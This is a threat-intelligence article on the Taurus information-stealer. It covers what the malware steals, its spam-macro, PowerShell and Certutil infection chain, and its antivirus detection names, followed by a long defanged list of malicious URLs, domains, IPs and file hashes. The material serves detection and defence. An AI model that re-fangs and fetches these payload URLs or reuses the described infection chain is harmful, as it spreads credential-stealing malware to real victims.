Taurus Stealer Gaining a Foothold

What is Taurus?

Taurus is an information-stealing malware which is been developed by a cybercriminal group named “Predator the Thief”. It is one of the unique kinds as it includes techniques to evade sandbox detection. In general, cybersecurity professionals use sandboxes to test potentially malicious software or malware. It has been observed that the cybercriminal group is been selling the Taurus stealer on darkweb forums for $100 or providing an alternate option to rebuild it with a new domain for $20.

This stealer is capable of stealing passwords, cookies, and autofill forms along with the history of chromium- and gecko-based browsers. Adding on to it, Taurus is also capable of stealing some of the popular cryptocurrency wallets, commonly used FTP client’s credentials, and email client’s credentials. Additionally, it can even take screenshots, upload and execute various executables and thus can infect the device with various other types of malicious malware like keyloggers, ransomware, and cryptocurrency miners.

How does Taurus affect its victims?

As per Zscaler, this malware campaign was been first observed in early June 2020 and since then it has affected many entities all around the globe. With the current statistics, it looks like the USA, Canada, Denmark, and Great Britain have been among the top countries which have been affected by this trending malware campaign.

Just like a batch flow process, Taurus stealer malware follows a process that involves a sequence of steps to affect its victim.

  • The group of cybercriminals initiates the spreading of this trojan type of malware just by sending a spam email to the victim containing an attachment, which further contains malicious macro code for downloading further payloads in the victim’s system.
  • Once the malicious attachment is downloaded and macro code is been enabled by the victim, then ultimately a PowerShell script would be executed via BitsTransfer, downloads three different files of the Taurus Project from the Github site.
  • After the downloading of the files from the Github site gets completed, then Certutil.exe command-line program would successfully decode the payload.
  • Then finally the malware would start stealing information and data from the victim’s machine.

This malware has been spotted out with different detection names by many anti-virus software programs such as Avast (detection name: Win32:CrypterX-gen [Trj]), Kaspersky (detection name: Trojan.Win32.Zudochka.ejq), McAfee (GenericRXLN-PF!51823A980FF0), etc.

Below are some of the snapshots showing Taurus dashboard, settings configuration, log lists-:

Taurus Dashboard showing its affect level around the globe
Taurus settings configuration details
Taurus logs details

IOCs related to the malware, including the relationships it has is below:

51823a980ff0515fc19a691c041d5000
hxxps://huodpljtja.space/log/
hxxps://huodpljtja.space/cfg/
huodpljtja.space
172.67.140.227
104.27.170.57
hxxp://huodpljtja.space/
hxxp://huodpljtja.space/cfg/
104.27.171.57
be689e507b251c23e0a5cb1b222f9f1f
f52ec2b174735cc21aca6f04a2ecad7b
hxxps://huodpljtja.space/
zvwxstarserver17km.xyz
hxxp://zvwxstarserver17km.xyz/tech.exe
8aab4ad447e599ce180893c6720d1838
d923d2f05822669b5d179cac17b8bc6d5f7dba83d319c123e2a361b613b8294b
atxspot20.xyz
freroxhottov.com
rexstat35.club
dexspot2.xyz
advert127ds.xyz
hxxp://freroxhottov.com/
hxxp://freroxhottov.com/freebl3.dll
hxxp://zvwxstarserver17km.xyz/socks777.exe
hxxp://freroxhottov.com/nss3.dll
hxxp://freroxhottov.com/softokn3.dll
hxxp://zvwxstarserver17km.xyz/lemon.exe
hxxp://atxspot20.xyz/statweb77/
hxxp://zvwxstarserver17km.xyz/desk.exe
hxxp://zvwxstarserver17km.xyz/host777.exe
hxxp://freroxhottov.com/145
hxxp://freroxhottov.com/mozglue.dll
hxxp://freroxhottov.com/vcruntime140.dll
hxxp://zvwxstarserver17km.xyz/lkx999.exe
hxxp://freroxhottov.com/msvcp140.dll
hxxp://zvwxstarserver17km.xyz/hrdp.exe
10a930155891c5cb867ed4938a8d335c
1426ea639f56f4b40053f54ef87f46b2
3aa3b3091fc780ce13a341e0eebb24b6
d87be573a26e97c5b4b8959aab27d931
a90b966ef0e65ef34f075dff8c98d83c
5.101.179.234
rexspot7.xyz
fedexserver.com
advertpage55.xyz
medspot2.club
seximo.ru
hxxp://fedexserver.com/o8yhdvavshlryr
hxxp://fedexserver.com/5lSHVHbwF7KWjCI
hxxp://fedexserver.com/b644WOyz
hxxp://fedexserver.com/b644woyz
hxxp://fedexserver.com/f4hlDmKbFLD
hxxp://medspot2.club/leKaN5
hxxp://fedexserver.com/fjmw2v7c4bhkm
hxxp://fedexserver.com/6Y7Nhg
hxxp://fedexserver.com/NUYUZV
hxxp://fedexserver.com/yTYONdlhh0wax5
hxxp://fedexserver.com/EySdG
hxxp://fedexserver.com/WhhxHGBaq9AdP
hxxp://fedexserver.com/72tjG
hxxp://dexspot2.xyz/statweb77/
hxxp://fedexserver.com/O8YHDvAVshLryR
hxxp://fedexserver.com/
hxxp://fedexserver.com/f4hldmkbfld
hxxp://fedexserver.com/OaHj2VT8oFow9jSu
hxxp://fedexserver.com/12Ca48nm1gH
hxxp://medspot2.club/hWOjkELZ
eac0a6a53d4a4353aace122055b4b4c8
8a0359f91c7e951568f7d5c595b745be
8ec174cbd17a2b008ad562802e2f6e66
0fb684cc15d197c0b937e5528359d7c8
hxxp://24.249.135.121/EXqUsIN/tRajkveCygw/H2jvu9p5/uPjzzklfEdGhk1h2/E885HulYjflL/zrdY31DIdfIf/
hxxp://104.236.161.64:8080/Z8OOXoCG/
hxxp://185.94.252.13:443/a5P9Ug/5VSe/Q1AQ/fknugZvsS5AS/dzj2cK2YgzDSujn/
hxxp://24.249.135.121/IIzxl3XGFoYoTf/
hxxp://24.249.135.121/lKwJK5/suryOS5J/D5Xw/xDRy/iA9n3t/
hxxp://24.249.135.121/H7ToT1E/MxgmMittJ2/iqv5OPh/Ez5h6kbqQhP/VBMYmd7rvWiIZrpIYm/muyEb1ouAvpvgqvd/
hxxp://butik.yesh.se/
hxxp://212.112.113.235/EgkNP0ep/4dLjAvQofzUF3Bs/HKmlx/
hxxp://201.235.10.215/GjWP8KoUINXaBrmI/9sgoGV6hvfqo3Qfzfwy/R0TCBAsL/e4us4Ov20HgaiDeerD/Rsj9O/
hxxp://sandsprecision.in/about-us/
hxxp://177.37.81.212:443/KXH5A/z5PfDwCH5NcefI/I3b0Wzvwf3UFZe/IpxMsiP5OWdaSMcGAs/
hxxp://test1.tobias-gross.com/
hxxp://test.siemons-it.nl/
hxxp://cubovision.streamup.it/
hxxp://coll.dock4.de/
hxxp://db.cordes.site/
hxxp://cordes-theatertechnik.de/
hxxp://24.249.135.121/nj0PJBwYDXijOlgm/mGFAR4tlZkRTa2C4/g50Yea/bf8NV5/xBIF2WPTbvoueZ2qzW/
hxxp://hub.edoc.sd/
hxxp://xmr.12roar.com/
650b63f5db067d426fa05ddca0f9d5a0
ce3addfeb00075e468790358a18f5ca3
1736988363bc114af7f7ffe8c202e994
hxxp://161.35.166.8/
hxxp://mypoledance.ru/
hxxp://159.253.23.237/
hxxp://orion-ufa.ru/
hxxp://104.248.147.11/
hxxp://topartist.ru/
hxxp://s056570c9.fastvps-server.com/
hxxp://enginer.ru/
hxxp://192.161.161.152/
hxxp://185.105.224.188/
hxxps://gotoestonia.ru/
hxxp://109.234.37.15/j1
hxxps://morshinnet.ru/wp-content/esp/omnwwCrInZBUDTQJZjBwaewWIm/
hxxp://185.4.73.250/
hxxp://5.101.181.67/543myM/amd.exe
hxxp://5.188.29.139/
hxxp://2bbce0d0495ceb022216e3ff3338ac14.brainberries.top/
hxxp://stuffonly.net/
hxxp://magicru.ru/
hxxp://95.181.157.66/
d35575566c86357d92cc45c338cdebf3
mypoledance.ru
orion-ufa.ru
topartist.ru
s056570c9.fastvps-server.com
enginer.ru
gotoestonia.ru
morshinnet.ru
2bbce0d0495ceb022216e3ff3338ac14.brainberries.top
stuffonly.net
magicru.ru
xn--80aaagqa6afo3bc7b.xn--p1ai
http://www.troika-reisen.ru
olee.kz
tirlan.ru
erawomans.com
order-info.design
n-a-m.ru
axegame.ru
vencera.ru
spmuz.in-crm.ru
butik.yesh.se
sandsprecision.in
test1.tobias-gross.com
test.siemons-it.nl
cubovision.streamup.it
coll.dock4.de
db.cordes.site
cordes-theatertechnik.de
hub.edoc.sd
xmr.12roar.com
team.dock4.de
declaraciones.xn--nario-rta.gov.co
synapse.artfuldev.de
procon-controller.hedservers.com
test.vernaillen.com
ionshop.c-castle.com
push.anime-rpg-city.de
lazia.it
sushimeshi.it
sabordobrasilfood.com
f3ece52d41c390cc7c5147ec0136679b
ca6f433c2eabf6f1890101b210a9f195
79a064395c918ffb235482201fe3968e
ffd48fdfd6d1ce8f405159a687e57e97
bae8586441dd22498a6dc9a3c4fabf0c
b8575fd9d146d13a5470d744c673ea16
bfea90acf60c6d5f7966ba3574cf5023
44128b2abb0da6294a10ec851e6975d9
bd3b8d905258a7c08bf2cdab0adf4c58
f16b7cca1c5611b7af9fae1e891a106f
8798bfb453d87e028368dddd174d8352
b88e11da8726e17b53f95e1dbe84418a
6e226417b0618164b50ce6e2483967a3
ce94c29bedc53195d50df292cde0d4e8
aa2b666a7a298b605fd4107280be6b0a
0c3da32365bcbe27b89074b17bc563e8
128beeb05b20ddef63fbbf2c6b99147a
a48e43c9fef446b00428162eff00a930
607810b6bbff4b785f06b16e1b47206b
a507c1cda21b9b253758cca73b221c33
diprotelco.com
elementalburn.com
boulderinn.com
185.94.252.13
179.60.229.168
103.15.186.10
216.37.42.10
24.249.135.121
192.168.0.1
guppon.com
gregladen.com
guarany.net
misenar.com
gsiquick.com
dc.services.visualstudio.com
hxxp://diprotelco.com/prueba/common_section/interior_lwu_6e3/YxTl9SXeSAq_Mmw3zqLz/
hxxp://elementalburn.com/7107012102381-23SZF9DZczYzLB-module/verifiable-lxb4xqxarsdu24p-gjvbk/421263-tnzzz/
hxxps://boulderinn.com/cgi-bin/738596_5vLpJ8jM5Tmw_zone/rgl2tdb_afoq_profile/FdWW0_KgG9v0G21pqG0/
hxxps://185.94.252.13/XdYtnz1jWdrhsfb7Kbd/cLWB6ul/ZvvV8lr1U8/oMwTNkBdWrAkmnc/yn0kx/QlRH6yrrssAE/
hxxps://dc.services.visualstudio.com/v2/track
hxxp://misenar.com/rideforhd/8Q/
hxxp://24.249.135.121/oeG8Oqd84U/J0RzgKR2TfhNV0S/kUrtmced1qo0/fFegU858uc/HMNyecwY7/
hxxp://guppon.com/kani/E6JqEyw/
hxxp://gregladen.com/blog/knEIK06090/
hxxp://185.94.252.13/TD3Pl6n/k8ez17r2o1q5ZokXy/9aFQFMXBd/QVPd7otFN4/
hxxp://24.249.135.121/vmGN5ZirS7vFtkV/7F9ctPN7SP/gGGjn/8YPCjt8Mdcu/hUUjfzqpBDQj43RQiTs/Lj57STJWYconPGM/
hxxp://gsiquick.com/prueba/gRQ9G61/
hxxps://185.94.252.13/8mzDUfhaR2WS0p/ijkU8zjuqwK2/UOXT0cqIB/XCMxSu9zQ/bbshzH0S/
hxxp://guarany.net/banner_tm/IUI2890/
hxxp://179.60.229.168/CrWCZerkIR7/vC0FRfE9THqtAb/
hxxp://189.218.165.63/4jo9u5/JpAM0/CItsVv/
hxxps://www.compednet.com/wp-content/Nv55027/
hxxp://77.90.136.129/arhFfCAzcUCzgSA7jV/RFqePD264U0dyc32ERd/wscW4hWzcndPjJYagDq/6prbUgIJb2QJ/PKzAwZpS0OWKrgYHI9/
hxxp://185.94.252.13/vhBHoJHIOQa04yocz6k/oI17Ml9bPPktL95I5u4/UHqEtU/ODBlSD/977Osz3ikYI2RgP/Qbq1g1RXiPGg5g/
hxxp://68.183.170.114/mNI3PJg9wcRsk/tCy6ETJ1E/vVbkYM5SQAb30Af8KE/aeU8NnHXBmU2SsYX/ZLxVgNHNtRO/c1z3RUGaKxiTN0T8pSO/
hxxp://185.94.252.27/fr5uOg/jAq3lEu7jJlZbe5/CpBoIGNDv4PE/
hxxp://186.250.52.226/i8GfE9QaXeVy9aZW/OyX1p/pTf5/
hxxp://eltallerartistico.com/language/Uybj0/
hxxp://217.199.160.224/4Rr2Jw/zH6Erxo1Jh/u32badpHFPk/
hxxp://arizonaonsale.com/cgi-bin/VuM64/
hxxp://191.99.160.58/Vx9cULYjYg/
hxxp://104.131.41.185/iVx4lag/s3hFYODGA2pxExEB/SR5iYFpqztFD/4JlVKoyCzarv8/gjJCLmKA2PzAt/22J0/
hxxp://51.255.165.160/OHwCqzeV/9WQjUBKabar5pp/iEWNVxD6Os/VPZhYt/dytM9OC50ITgvVz6NT/
hxxp://classicpaint.net/wp-content/tVS1/
hxxp://closhlab.com/OWN/lUvYIzLMa/
hxxp://closhlab.com/cgi-sys/suspendedpage.cgi
hxxp://2.47.112.152/HxAjy/7YYwEIg/GHlRnQCM3P2/37qCL6wxPBsxm/fA0OkgMAoP6Lqx4/EelHQU58i/
arizonaonsale.com
eltallerartistico.com
classicpaint.net
closhlab.com
http://www.compednet.com
104.131.41.185
2.47.112.152
191.99.160.58
189.218.165.63
77.90.136.129
217.199.160.224
185.94.252.27
186.250.52.226
51.255.165.160
68.183.170.114
174.79.51.34
157.245.217.46
hxxp://ionshop.c-castle.com/
89bb90e890a887db9286de62a2f921a5
dcff5010eaa5987370e2ea256e8c7adc
05c44a4261ee2b3dd7ae1b53e4eaa4ff
956b4be79a9f4e5d727ec94664b8be7c
d9cd06c7bd37bf2178099a6025c2c693
4c1daff7319c5b6ef750a56f319d88c1
f551b6ba726f71d84c82384099e53234
10f421b7720378eec62a8a6f2f8e5cce
8eb5a4726b9334ca6f0e3cf26c903220
53ae32c4e4f21456a2fd3246d108b729
77afa61f6ae19c9c8e3ae53526e7435f
9da484866f91d749de65839f7afd8992
2a874d91d450ce5612ea4d7dc425f190
a9e0fbe84d6f9e4b5bccee8aec879357
7c36bcd7c261858a42306b190e062a9f
a374eb727d972948d997679033720e4d
a576e1fdec38757e9238e05f8bb35f19
ebd4914b20ae4dc027e0bb84376b3041
035e7c94e75b92d19cad2ed9c10fc846
5c46ceeb7679bf0668605b310fde7d6e
zwaj.c-castle.com
acc.c-castle.com
woo.c-castle.com
store.c-castle.com
core.c-castle.com
http://www.c-castle.com
test.c-castle.com
webdisk.c-castle.com
mega.c-castle.com
backend.c-castle.com
saudia.c-castle.com
fever.c-castle.com
212.227.254.249
ddbb140f4b29ab0e415b312c8824e7ff
7d1a44494d23adda4f5e2c984a8a00ad
f35fd9e58fab09d48e0700a431c53619
8e99d11f032a4cd2a686e707e4908fc8
ae49f7cd9948287ba34cda7d554674d4
ac0a98aeba23ad380400a78633773796
43cd7bbc28314335d329f990508e1ff9
78a126e38a3d58b02ea8b5d4f0ec12b3
8cce9ca8d41399510eac7c7f0b93f737
d47a48fdb3562048066638da00bd64d7
4a9638c367d1665f2008afc6d60f4152
d55f60df1b285ab5c7360a7ca5909799
7898a5fab27bd4e06d6af27ed7e158f1
e917e98cc58676d9e941e547be401e3e
a0a4a0fce7fcd7e99b88678517ea1a9e
bb8a1d3b479b0f1ca6fa918266b7e40b
9242216e03fa4be861ed83d346e0f2a3
85fb52ced8e612530f203be515dc85e3
56016f36d97cb4a8450272aa7e3b5d11
8dce59ae8ddc42b04d1f7e2c0c95ec3d
hxxp://rexspot7.xyz/statweb77/
hxxp://rexspot7.xyz/
185.193.38.231
148.251.72.21
1e2fdf25d723b96e6b130462dcc2dfc7
bd82718e51a17d6f3bf28a7fda4f77ec
2aed706154c87cf0a14fb5b8f07dd7f1
e0472300abdce278516e35da4a74dba2
b19eb0d7891adcd44081f88b3b801db2
0b863f433ff980e4f9d4bae62b264561
9ad3fd81e6a12d629ffe26ff63fd5400
da2a9418f2c4c116ea976363f9fe16e8
f9f88107f4f4ec9dd04f7068a38a98db
459c795187f38486dbb1de8842d4dea9
b88f761e55b1a9151b08a309e78dbe11
4ed2de8953e63264095081f2fa3bc42c
ec082888355a8c99f6a1effda264b8c3
ca2a9af486e93f41e23137173c6f25d5
7c7ed3020b3c9ad88c1c1a9e2659c442
66dc7418bb09be71b170971a143d33cd
899b5365687b857acd8c052ffef318c7
15228a7d53075b358339d4536ecca299
1bc3d90470901540ad90742bfe2e458f
ce11232b63852eea83100f60c33bbeaa
aa37c1df7e1c6c408e950be9ecc96af6
cbdd6ef685ffbf1427f59927d3c1a982
c3dc3925a0ad88cc155b615f3ff6e4a9
65017df31ac1ee454bd1adf3d4ecce8d
3e08c62404246420fa924925234db800
8cb98f203b086e71b780bde03c1dfeb0
c1774584dc35de8270c9dc5ffbe7bda8
fe556c468d9b25faea5052a34266924e
d09427107cc6bab63ecb56ecc9cc8b65
cc7ed1db541723ef75c59d74ac8b28e6
f4735ac38228dac4bc27594ad34612a8
5a6a27633b4d79e089d5529925ecf09a
0291f7868a4afb1a2f20b7705917300b
6672c1e215c79645c768581488db3a30
be0a0d667cab3ecfeddbad1aa33f6fa5
652f72f3fe81ce4be82e730aef461fb9
1e06c412523e29a8d0561661e22643d1
76a12dee855b76f8449705b767ef2bd4
4ae6e818fd0b55f5b1240c45ef264947
dba604a4e7aa04e057ad6ff51921c002
0c1d2935673eba4b15fccf4423f1ff0b
bca4ca74310285f06657e2173174b44a
ef418c51365cd3c312cfe48e923c2d18
a95b9d33ee76320011cad7eb993ead1b
c936bedf96a020dcdd011ec37e815a00
871953a98d4150c33c69a0c5ae9a68c6
8fcc765eab285bc30b2486ffe4cd40d5
37614544d90752d51966a6de549602eb
732171aa1f304f679e705b92dcc42966
848841740a29f7c092d79feca25c93c4
f8cddd89835a80f8185410eaee637eb1
3ce438ed9e685112b2cc74aea5d5f073
9c342d31655507d79212bc19172f7971
935993633b2b76801377404755e46c23
f7c199d6c2e01cc5b71ead5f7afc412a
f4ad1569f76c2c40376fe63fad19697a
fd4226def36882a80317008665bc89af
0c85f1d416147be9cb91b94f86e98071
dc4459962b793b9de66cfbaa893cb8d7
b88952f16ab04eb17fea66025c4afeb0
fc7e02338eaed19eaf9f0d6dc01ad8eb
6b7fc21a087064af407261ded0aa223b
b2a8a5e4165c41d492139dd990864697
f12499d8558490ff7e2041bff5869f96
960751e1d5a906183e9e2907cca20df0
92996f3b78a84c9b1dfe7b8359e45140
de12e513cd47d1f70472e872de44dc60
1e20ff820598309b59309e834d6f4a74
b9ace13dafee90a24223b6511bdc164790849e61e3745688fb846b05919e104e
d59c248a86017c8e725741249608dca8ddcd691973d825e86180bcc1088c9a3d
9a250e7f1f6961be6bdafbd46ba175b7fc92f8c762743216e2d5a7408c1b4780
8c120b97124e141b01727eeffc4fa0be10d548ff82df83bb0d117bb2ecb1bcaa
1bd971c1c38c6f02bb22235b8cbde1e2f8995223bcfcf378cb6243a3bf594eba
fc27331316aa18e817991e255fbcc44e
434ad7e50b1b9d8582f55ba1a822cfc917a087b762e97dd2bf9574bfc088e1dc
06fda3083d8047f9dbf21fe0f214ea01ecbe80dfed8fc3a2ad2cf734d81a8b95
707223933465cb3eb936cd6f98a2ad42a5083f705f3dc4a5659051ebb5d9c4cf
da0cd63f6f2cbb99500ab2bbbd8856dc721071a42a4f0b25d41af7232b1c0541
4684d35664b98a00ae06938b95a72ca65607aea29412aac96010ff029a2944e3
890e0c16127b443f967361ce622154a565e878c0fe6d8c0bdb4f55ef212a3a3d
2f7db4ede3e84935d565dd039435ad338d53907d9604d1bd7077863374dccc84
307937960074ce86bde3d0a38469f395dccf142d10ba7c001c0e6f3e909e28b1
3030678fadae01223e71305f77ca2969640fcf92f242fa79e331dc2ec26d838d
25894f492854ded3d76c2137171f77e8eaf548496419ce0d268df0410cff5282
7c1830b6824b0c3c314a1a646fd1478447dec6d04ab18911272eb54a4cd7800c
b0a63a2330c97af0a7d2079b31097884cebffed8b5e445cc9acf048e82524213
cb827a322393b0bcef1307aca3c28f096d41462d3947832a0ed64047ff4aad17
e5ea6fcce9fd59489b2ac63ad94657d1cf556d5cf289653cc087bb1ed5dd466f
hxxp://24.249.135.121/MmhUsYSYB/3pMQsP2q6hlCjl6QqS/
hxxp://24.249.135.121/MGAwbhFhs6vJg7MzqT/HyMvwtBR/LPGJwr/TnBp/JctMp/
hxxp://24.249.135.121/P64lzXaZO4f9vKV5V/pmOAvLt8fuu4PSIpSX/lvVjYQTzl4/qTTZzv792Uq/cm7Mk6itil6yg/k597u75C4vzzkw/
hxxp://24.249.135.121/gnw7TOwXavlbx75lqi/
hxxp://monom.si/uplifting/closed_2MhOJK97t_zX1PELecG/test_iUn0ooAg5_HHpjdXrb9/ykvZqYoUEj_iG950auyK324/
monom.si
hxxp://24.249.135.121/Kryg/DbdDYIG/bQObONunB/MCRl/ciavjNAAleq4/
hxxp://24.249.135.121/ZmOIu6UH6me9MbHbbtL/Pl2APXC/tQYfs0YlECUfcsYzCl/LDGcn8z4/
hxxp://24.249.135.121/m4Q7mJZR/TIsPOwKJ0R3Itn/4PMA8YGgfsAYT/A4T17bXE/uxmZ0OPp5KHGob2Oie/
hxxp://24.249.135.121/g5hlu2f/6JPhbWfuyuq1bvNiLm/
1bda7cbdb883fa2aaaa84b23fd7bc0e9
109.228.55.205
d7be3f1326ce328784971085b7be03c8
b4891d6a63bac2b7348c1d0cfc711828
184.170.148.50
e1ff5394f33e1f64afea4958837d3661
f61ad336144bd1c310aeb2952f94f76a
hxxps://185.94.252.13/aGLVPXir02y0/akK02GGDCx7CrRxGkr/S6aIJSS8dGf/MgYWjW/O9sP0lxOpeKs1KP/
hxxp://185.94.252.13:443/dNgeTacBy59R/
hxxp://185.94.252.13/VIqtJa7Ae/uf2eDzbA/
hxxps://185.94.252.13/EIRJAsTQUb/gB6rwZ/vgXS9QSf/
hxxp://179.60.229.168/TFAQqQe8TlAPXgWK/qGRlD63/5mSW3u3K0HB/
hxxp://efetiva.net.br/cgi-bin/closed-yZfPU-7aVGSR1/id8b2tvz8m9g-zg95mhv3adnnez6-portal/j56-1y9zzsyt81z64z/
hxxp://easywork.com.br/online/personal_module/verified_area/r76gl3x5v6v_6svxs3
hxxps://www.directresponsegroup.com/cfc/common_sector/826050420871_5ToPo9_forum/C7qQJEIWI1y_6hd84432iK
efetiva.net.br
easywork.com.br
hxxps://www.elseelektrikci.com/wp-content/hedk3/
hxxp://109.117.53.230/0uONkvrB764i1z/
hxxp://212.51.142.238/Zy6GyPQtKFW4UFd/gpAz1Lz/wQuvgQaxMRb0qlI25/Rqoy/hrsqJnVNtWiPkdI7Q/ABSegTCKUp7SIE/
hxxp://190.160.53.126/QYE1t4h33VLFgNWhlg1/wzAkYt6sjp7/
hxxp://190.108.228.62/84kzGQ4Ge3Wx3Anji5r/mcIj/
hxxp://173.91.22.41/wOZAEVN/yIqZiZdYdjhH/
hxxp://46.105.131.87/zyjw31fu8NbkFcJKE/4RB6EL/0iLC7yF4T0MEVU/ptCy3kS4E5uNiKSU/uDu29ysvYtZ/soA3SxDk18Si4QLcQ/
hxxps://www.tri-comma.com/wp-admin/MmD/
hxxp://31.31.77.83/jlqwb3H7ZJtT/7p8jwjGB/0ouI8NVryi4/
hxxps://skenglish.com/wp-admin/o0gf/
hxxp://212.51.142.238:8080/JMhJkpzTlOyKzyc5/tzeyw/nh8YVb/
hxxp://186.208.123.210/80Fx/CnmOQPuFBmiQu/ofRM9bTIdhp/
hxxp://222.214.218.37/GQYtp2ldW/YnIQsVIN6i0I1AbCV/UykgLweHBwU/HCz51FV6/xYz4/7uHohi/
hxxp://91.211.88.52/FBme/36ORWYCUYQ66/amY8TTPA9GGzOkFT/
hxxp://212.51.142.238:8080/hbm3/
hxxp://62.75.141.82/GtfLbHN9AI/BNWerHPy/mgndbM/3mfxzF9G3v6pPe/URHo/
hxxp://139.59.60.244/JlZoOHbIzG1HcQAN37/
hxxp://ntrcopz.com/upload/
hxxp://162.252.172.124/JwUgQkUwNEVFMjlGQjJGNkMyRkQwNzk1OUEzQkU3NEY5M0I=
hxxp://46.17.98.194/1.exe
hxxp://185.238.1.160/1.exe
hxxp://rmailadvert15dx.xyz/ant/ant.exe
hxxp://rmailadvert15dx.xyz/sky/ztx777.exe
hxxp://rmailadvert15dx.xyz/dan777.exe
hxxp://2.56.215.211/index.php
hxxp://rmailadvert15dx.xyz/val/val.exe
hxxp://blogserv27.com/blogpics17/
hxxp://rmailadvert15dx.xyz/pred777amx.exe
hxxp://rmailadvert15dx.xyz/atx555mx.exe
hxxp://rmailadvert15dx.xyz/socks777amx.exe
hxxp://blogserv279.club/blogpics17/
hxxp://35.246.108.168/gate/log.php
hxxp://rmailadvert15dx.xyz/sky/dmx777.exe
hxxp://94.242.59.47/tor/server/fp/fe0877028c40abb144b2d5f1db22ba578cefb641
hxxp://45.147.229.195/api/check.get
hxxp://rmailadvert15dx.xyz/dmx777amx.exe
hxxp://199.58.81.140/tor/status-vote/current/consensus
hxxp://rmailadvert15dx.xyz/isb777amx.exe
hxxp://rmailadvert15dx.xyz/atx111mx.exe
hxxp://www.blogserv27.com/blogpics17/?from=@
73a75e40d5b73fe35ded2a82b1743cbe
1abac1b60a1cfaab3fe1c8811e2635d7
4c606a5ef36cacc4a8c09b8fef167b56
2078594ceb217fdb63e18df6a375111a
3fbbf63b4d3d9de4b4ea5d55eff60d88
15c1ebe32ab56e1b16c7b85332b6cfa4
40fd3e28a18cc1159c4e1fa0b5857ad0
d2a56ea2e2c390191b618810ecd79ffe
9b227b587a1ff56d6f93e563f3fc53b1
20d0bf22b3c06c42b0c366608500c9b0
a035b7344995592723eae97e0599c0b5
38a19b0da844c18ca52ac34d95c4523c
3a4bdb4d11b895f837cc4658a8402f2f
8089eec0badc1651480858c3b30085aa
632c40042b07ffdd2838ca92f2bdb555
58f16a170742c59500a62be4f22ce583
b5378f4d0b9b76ba741fc1fb275e8f97
dab3b6764bd87472d6f58256d6f4dbb1
d3f325168cb0bda8f729d2e40db7b3a4
7fd88745da068f2ed3001464d1728427
hxxp://gotoestonia.ru/2012/08/02/obnazhenny-e-lyudi-v-foto-installyatsiyah-spensera-tunika/
hxxp://gotoestonia.ru/88665UFDWWT/PAY/Business
hxxp://gotoestonia.ru/pymxtme/pb8v0j3.php?csvuxtwnl=masshealth-pca-jobs
hxxp://gotoestonia.ru/pymxtme/lblsqnx.php
hxxp://gotoestonia.ru/pymxtme/lblsqnx.php?csvuxtwnl=lg-microwave-lmv1813st-grease-filter
hxxp://gotoestonia.ru/88665UFDWWT/PAY
hxxp://gotoestonia.ru/2013/03/02/brat-ya-safronovy/
hxxp://gotoestonia.ru/fils/US/Passt-Due-Invoice
hxxp://gotoestonia.ru/2012/06/27/radosti-leta-ot-kubja-hotell-loodusspa/
hxxp://gotoestonia.ru/pymxtme/duz2jnv.php
hxxp://gotoestonia.ru/88665UFDWWT/PAY/Business/
hxxp://gotoestonia.ru/pymxtme/jezabud.php
hxxp://gotoestonia.ru/granitsa/
hxxp://gotoestonia.ru/fils/US/Passt-Due-Invoice,smtpprotoheader.ehdr
hxxp://gotoestonia.ru/files/us/past-due-invoice
hxxp://gotoestonia.ru/88665ufdwwt/pay/business
hxxp://gotoestonia.ru/88665UFDWWT/PAY/
hxxp://gotoestonia.ru/pymxtme/jezabud.php?csvuxtwnl=
hxxp://gotoestonia.ru/granitsa
hxxp://gotoestonia.ru/2012/08
3ece98240c0e528736803734af590471
646fc290e82516da4cb0dc106bbe13c0
f0e373df02a6428ea253c9be03834186
49ac863e27857eed0e868b37527da560
2b2ba743b6b4be2ce4f092355e5dcf22
9b30dc58d81d586473dc8e9966664a22
88cfb59daf7ac57e89e9dd9935ea6253
7c539f9fe35218bbcfe2ef211f6a4abd
5d7cadac7e025a4b6430a515983022d0
0a04491d29b1f32c2720458714bbe416
790ef157c85a6a5367ae78d51bd12bc8
cc9fa2373445363017b51ebbc4b74806
14a67cca634508a5b26e90b7ac56f83d
425358a22b7d3225187cd77aa3cabc20
bfc4bc8042e23c49c925444dab960832
f7f21200cf222e5e8d4190207f9081ea
hxxp://hex001.info/upload/
hxxp://hex001.info/
hxxp://hex001.info/upload
188.142.189.206
46.214.214.39
77.70.124.174
89.36.250.165
186.107.71.209
190.158.226.15
51.223.94.110
88.203.214.58
62.141.241.11
190.218.130.136
37.107.70.199
88.203.215.122
78.40.46.135
46.10.66.102
213.222.130.75
179.8.51.76
37.75.49.130
151.237.138.38
87.97.246.67
95.140.195.178
216.126.201.89
9081aa49760ccd7e516d2260d73caacf
be4c631ab9824cbb21c1a7d7698344d9
8102c47cfe881bd30b56896c460ffba5
ac1a1b229ca98c187e95323c93a54255
90c6da7f3ccc732035264cd8b83216fa
f3d6e0040943a45c63feaf32be2fd9b0
91a2c381b88136982835294de76eeecb
6eb3167af837e4d5e0023fe3f3b67f15
a8655cb419605a2c753ea1f3b5aa5789
87ca3451dbdc48d9b3e6c8e62b14b486
a13bcef5a7d15393c6f5ee280f051a60
2533ec36d5da808a83a71446b654c010
6de887a42198459d327320ddaca06b35
9af74d11421537b711f73b1ce8c87dca
dd7c17e49b5cd63c0143b0ad1b32c7be
bf4838dca4dc8530e8c523867a778735
59332a63ae088aaf33ba86c4e2003c01
a439d916223855c9d8aa86d46e38444b
0806a4006db65bb2af0370f7dd8f20cd
58863ab920a3df46bc4b716489a99bf3
hxxp://fdmail85.club/statweb77/
hxxp://dgxxadvexmail19mn.xyz/desk.exe
hxxp://dgxxadvexmail19mn.xyz/socks777.exe
hxxp://dgxxstarserver17km.xyz/cfg/
hxxp://advertxman7.club/statweb77/
hxxp://dgxxadvexmail19mn.xyz/host777.exe
hxxp://dgxxadvexmail19mn.xyz/lkx999.exe
hxxp://dgxxstarserver17km.xyz/log/
hxxp://dgxxadvexmail19mn.xyz/mtx999.exe
34.102.136.180
5.61.46.146
hxxp://dgxxmailserv19fd.xyz/host777.exe
hxxp://dgxxmailserv19fd.xyz/mtx999.exe
5.61.33.129
195.189.96.212
fdmail85.club
advertxman7.club
dgxxadvexmail19mn.xyz
servicem977.club
dgxxstarserver17km.xyz
mxblogs19.xyz
dgxxmailserv19fd.xyz
baa36f82fe1a614271e0cfeeb658f997
920cee525090d61e93eded8e674d0ab5
92f167359671a225b55b215f0b759a95
180057913800b7644ecab1b65399b2b2
2420aab92f8389d700ad5b22cc74f209
3d099c09b63337c19a17363c08326196
c8a97c683bd0d4c1125a22c4a575d617
05835b3128219c8f554eb03e17d34bb8
1b9c561cce4ff898f18c25ee9239e66b
9f9346983718f8615a420332550bd6ed
11532a7b5c934387d69156f7e55ae4a2
d1f82c1d465a9e410d18d85dae209503
